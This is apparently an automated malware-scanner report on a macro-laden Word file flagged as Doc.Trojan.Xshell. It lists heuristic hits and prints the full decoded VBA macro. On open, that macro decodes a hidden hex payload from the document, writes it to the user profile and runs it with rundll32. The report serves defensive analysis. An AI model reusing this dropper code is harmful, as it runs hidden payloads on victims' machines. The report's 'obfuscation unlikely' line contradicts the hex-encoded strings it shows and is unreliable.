MALICIOUS
266
Risk Score
Heuristics 9
-
ClamAV: Doc.Trojan.Xshell-6923080-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Xshell-6923080-0
-
VBA project inside OOXML medium 4 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
Shell rdl -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() -
Auto_Open macro low OLE_VBA_AUTOAuto_Open macroMatched line in script
Sub Auto_Open() -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
pth = Environ(s2) & Chr(92) -
Remote image (web beacon / tracking pixel) medium OOXML_IMAGE_BEACONDocument references an external image URL — loads automatically on open, revealing IP address and timestamp to the server (used for phishing tracking and NTLM hash theft on corporate networks)
-
External relationship medium OOXML_EXTERNAL_RELExternal target in word/_rels/document.xml.rels: http://main.windowskernel14.com/spl/image/Opr122Opn.jpg
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://main.windowskernel14.com/spl/image/Opr122Opn.jpg OOXML external relationship
- http://www.arabkids.com/__dec/filepart2.aspx/index.jpgIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingCanvasIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 2847 bytes |
SHA-256: 7b63db6c10ffec8799a1cd6e10feba550e160d8adfdae84131be18c5a04644b1 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Module1"
Sub Auto_Open()
getPicture 1
End Sub
Sub AutoOpen()
getPicture 1
End Sub
Private Sub getPicture(Void As Integer)
bmw = "5553455250524F46494C45"
Dim s2 As String
ind = 1
While (ind < Len(bmw))
Dim bt As String
bt = Mid(bmw, ind, 2)
Dim tt As Integer
On Error Resume Next
ij = CLng("&H" & bt)
s2 = s2 + Chr(ij)
ind = ind + 2
Wend
pth = Environ(s2) & Chr(92)
s2 = ""
s1 = "5C70696333342E676966"
ind = 1
While (ind < Len(s1))
bt = Mid(s1, ind, 2)
On Error Resume Next
ij = CLng("&H" & bt)
s2 = s2 + Chr(ij)
ind = ind + 2
Wend
With ActiveDocument
qtr = 20
kit = qtr / 2
pik = 2
With .Range
f = FreeFile()
DoEvents
jot = "0"
With .TextRetrievalMode
anosh = "http://www.arabkids.com/__dec/filepart2.aspx/index.jpg"
dc = Mid(anosh, 26, 4)
xmt = Mid(anosh, 44, 1)
fnm = "~$"
Dim a As Byte
fnm = fnm & "cache.doc"
.IncludeHiddenText = True
azb = 5
End With
DoEvents
aea = azb + 5
For q = 1 To qtr
bb = bb + "0"
Next q
End With
poi = Mid(anosh, 35, 1)
aei = aea - 2
dc = "," & dc
With .Sections(pik)
DoEvents
With .Range
poi = poi & Chr(qtr * 5 + 11)
DoEvents
With .Font
.Hidden = False
End With
aaa = .Text
DoEvents
For p = qtr To azb Step -1
anosh = Str(p)
pcc = jot + xmt
lamb = Trim(anosh)
If (p < kit) Then
kml = pcc + jot
aaa = Replace(aaa, kml + lamb, bb)
Else
ss = pcc + lamb
aaa = Replace(aaa, ss, bb)
End If
bb = Mid(bb, 2)
Next p
ozodo = pth & fnm & dc
poi = poi & Chr(qtr * 5 + 5)
If (Mid(aaa, azb - 4, azb - 2)) = poi Then
ghos = True
.Text = "."
End If
End With
With ActiveDocument
With .Sections
If (ghos) Then
Open pth & fnm For Binary As f
aaa = Replace(Mid(aaa, aei), " ", "")
s2 = ""
s1 = "72756E646C6C333220"
ind = 1
DoEvents
While (ind < Len(s1))
bt = Mid(s1, ind, 2)
On Error Resume Next
ij = CLng("&H" & bt)
s2 = s2 + Chr(ij)
ind = ind + 2
Wend
rdl = s2 & ozodo
DoEvents
For i = 1 To Len(aaa) - 2 Step 2
On Error Resume Next
ch = "&H" + Mid(aaa, i, 2)
a = ch
Put #f, , a
Next i
Close #f
DoEvents
Shell rdl
End If
ctn = .Count
End With
For i = 1 To ctn
With ActiveDocument
With .Sections(i)
With .Range
With .Font
If (i < pik) Then
.Hidden = True
Else
.Hidden = False
End If
End With
End With
End With
End With
Next i
End With
End With
.Save
End With
End Sub
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 15872 bytes |
SHA-256: 157d5c351f451bca1dbe81bc0cd70da372309b123079dc7b4552c8c574b95209 |
|||
|
Detection
ClamAV:
Doc.Trojan.Xshell-6923080-0
Obfuscation or payload:
unlikely
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.